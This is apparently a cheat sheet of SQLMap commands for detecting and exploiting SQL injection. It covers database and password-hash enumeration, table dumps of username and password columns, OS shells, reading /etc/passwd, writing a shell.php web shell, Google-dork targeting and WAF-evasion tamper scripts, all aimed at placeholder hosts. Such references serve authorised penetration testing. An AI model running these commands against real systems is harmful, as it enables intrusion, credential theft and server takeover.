SQLMap
SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.
Installation
# Git clone
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py
# Kali Linux (pre-installed)
sqlmap
# Update
git pull
Basic Usage
Target Specification
# URL
sqlmap -u "http://target.com/page?id=1"
# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=pass"
# From file
sqlmap -r request.txt
# From Burp
# Save request from Burp → Copy to file → sqlmap -r file.txt
# Crawl website (--crawl=1 follows links one level deep from the start URL and tests what it finds)
sqlmap -u "http://target.com" --crawl=1
# Google dork
sqlmap -g "inurl:'.php?id='"
# Multiple targets from file
sqlmap -m targets.txt
Request Options
# Custom headers
sqlmap -u "http://target.com/page?id=1" --headers="X-Custom: value"
# Cookie
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abcd1234"
# User agent
sqlmap -u "http://target.com/page?id=1" --user-agent="Mozilla/5.0"
# Random user agent
sqlmap -u "http://target.com/page?id=1" --random-agent
# Referer
sqlmap -u "http://target.com/page?id=1" --referer="http://google.com"
# Method
sqlmap -u "http://target.com/api" --method=PUT --data="id=1"
# Custom HTTP method
sqlmap -u "http://target.com/page" --method=OPTIONS
Detection
Parameter Testing
# Test specific parameter
sqlmap -u "http://target.com/page?id=1&name=test" -p id
# Skip specific parameter
sqlmap -u "http://target.com/page?id=1&name=test" --skip=name
# Retrieve everything (--all is an enumeration switch; sqlmap already tests every parameter by default — use -p or --skip to narrow)
sqlmap -u "http://target.com/page" --data="id=1&name=test" --all
# Level and risk
sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3
# Level 1-5: number of payloads and which inputs are tested (Cookie from level 2, User-Agent/Referer from level 3)
# Risk 1-3: risk 2 adds heavy time-based tests; risk 3 adds OR-based payloads that can modify data if the injection lands in an UPDATE/DELETE
Database Detection
# Specify the back-end DBMS up-front (skips fingerprinting; omit --dbms to let sqlmap detect it)
sqlmap -u "http://target.com/page?id=1" --dbms=MySQL
# Force DBMS
sqlmap -u "http://target.com/page?id=1" --dbms=PostgreSQL
# Batch mode (never prompts; takes the default answer to every question)
sqlmap -u "http://target.com/page?id=1" --batch
# Verbose output (-v 0-6; 3 also prints the injected payloads)
sqlmap -u "http://target.com/page?id=1" -v 3
Enumeration
Database Enumeration
# List databases
sqlmap -u "http://target.com/page?id=1" --dbs
# Current database
sqlmap -u "http://target.com/page?id=1" --current-db
# Current user
sqlmap -u "http://target.com/page?id=1" --current-user
# List users
sqlmap -u "http://target.com/page?id=1" --users
# List DBMS users' password hashes
sqlmap -u "http://target.com/page?id=1" --passwords
# User privileges
sqlmap -u "http://target.com/page?id=1" --privileges
# Database roles
sqlmap -u "http://target.com/page?id=1" --roles
Table Enumeration
# List tables
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# List columns
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --columns
# Count entries
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --count
# Dump table
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --dump
# Dump specific columns
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name -C "username,password" --dump
# Dump every table of every database (slow and noisy; prefer -D/-T to scope the dump)
sqlmap -u "http://target.com/page?id=1" --dump-all
# Exclude system databases
sqlmap -u "http://target.com/page?id=1" --dump-all --exclude-sysdbs
Search
# Search column
sqlmap -u "http://target.com/page?id=1" --search -C password
# Search table
sqlmap -u "http://target.com/page?id=1" --search -T users
# Search database
sqlmap -u "http://target.com/page?id=1" --search -D admin
Advanced Features
OS Exploitation
# OS shell (needs stacked queries or DB file-write privileges; may stage a helper file on the web server — remove it when done)
sqlmap -u "http://target.com/page?id=1" --os-shell
# OS command
sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami"
# Out-of-band OS session via Metasploit (--os-pwn prompts for a Meterpreter/VNC session and needs a local Metasploit install; it is not PowerShell)
sqlmap -u "http://target.com/page?id=1" --os-pwn
File Operations
# Read file
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd"
# Write a local file to the DB server's filesystem (needs DB file-write privileges and a writable destination; --file-dest is the remote path)
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
SQL Queries
# Execute SQL query
sqlmap -u "http://target.com/page?id=1" --sql-query="SELECT user()"
# SQL shell
sqlmap -u "http://target.com/page?id=1" --sql-shell
Registry (Windows)
# Read registry key (Windows back-end only; --reg-read/--reg-add/--reg-del as written are incomplete — they also need the key via --reg-key, and --reg-add needs value, data and type)
sqlmap -u "http://target.com/page?id=1" --reg-read
# Add registry key
sqlmap -u "http://target.com/page?id=1" --reg-add
# Delete registry key
sqlmap -u "http://target.com/page?id=1" --reg-del
Injection Techniques
# Specify technique
sqlmap -u "http://target.com/page?id=1" --technique=BEUST
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Time-based blind
sqlmap -u "http://target.com/page?id=1" --technique=T
# Union-based
sqlmap -u "http://target.com/page?id=1" --technique=U --union-cols=5
Authentication
# HTTP authentication
sqlmap -u "http://target.com/page?id=1" --auth-type=Basic --auth-cred="user:pass"
# Digest authentication
sqlmap -u "http://target.com/page?id=1" --auth-type=Digest --auth-cred="user:pass"
# NTLM authentication
sqlmap -u "http://target.com/page?id=1" --auth-type=NTLM --auth-cred="domain\\user:pass"
WAF Bypass
# Tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment
# Multiple tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,between
# List tamper scripts
sqlmap --list-tampers
# Common tampers:
# - space2comment
# - between
# - charencode
# - randomcase
# - apostrophemask
# - base64encode
Bypass Techniques
# Random user agent
sqlmap -u "http://target.com/page?id=1" --random-agent
# Delay between requests (seconds)
sqlmap -u "http://target.com/page?id=1" --delay=2
# Threads (1-10; speeds up blind retrieval but adds load and log noise — not a bypass)
sqlmap -u "http://target.com/page?id=1" --threads=10
# HPP (HTTP Parameter Pollution)
sqlmap -u "http://target.com/page?id=1" --hpp
# Chunked transfer encoding
sqlmap -u "http://target.com/page?id=1" --chunked
Output Options
# Flush session (discard results cached for this target and re-test from scratch)
sqlmap -u "http://target.com/page?id=1" --flush-session
# Fresh queries (ignore cached query results but keep the rest of the session)
sqlmap -u "http://target.com/page?id=1" --fresh-queries
# Output directory
sqlmap -u "http://target.com/page?id=1" --output-dir=/path/to/output
# Session file
sqlmap -u "http://target.com/page?id=1" -s session.sqlite
# Traffic log
sqlmap -u "http://target.com/page?id=1" -t traffic.txt
# Hex dump
sqlmap -u "http://target.com/page?id=1" --hex
# CSV output (CSV is the default dump format; --csv-del only sets the field delimiter)
sqlmap -u "http://target.com/page?id=1" -D database -T table --dump --csv-del=","
Performance
# Optimize
sqlmap -u "http://target.com/page?id=1" --optimize
# Threads
sqlmap -u "http://target.com/page?id=1" --threads=10
# Keep alive
sqlmap -u "http://target.com/page?id=1" --keep-alive
# Null connection (retrieve page length without fetching the response body)
sqlmap -u "http://target.com/page?id=1" --null-connection
# Predict output
sqlmap -u "http://target.com/page?id=1" --predict-output
Scenarios
# Authenticated test with cookies
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abcd1234" --batch
# Pull a specific table and columns only
sqlmap -u "http://target.com/page?id=1" -D appdb -T users -C "email,password" --dump
# Use a saved Burp request and limit tests
sqlmap -r request.txt --level=2 --risk=1 --batch
# Time-based blind only; --time-sec is the delay in seconds used to detect it (5 is the default; raise it on slow or jittery links to reduce false positives)
sqlmap -u "http://target.com/page?id=1" --technique=T --time-sec=5 --batch
# Try common tamper scripts for WAFs
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,randomcase --batch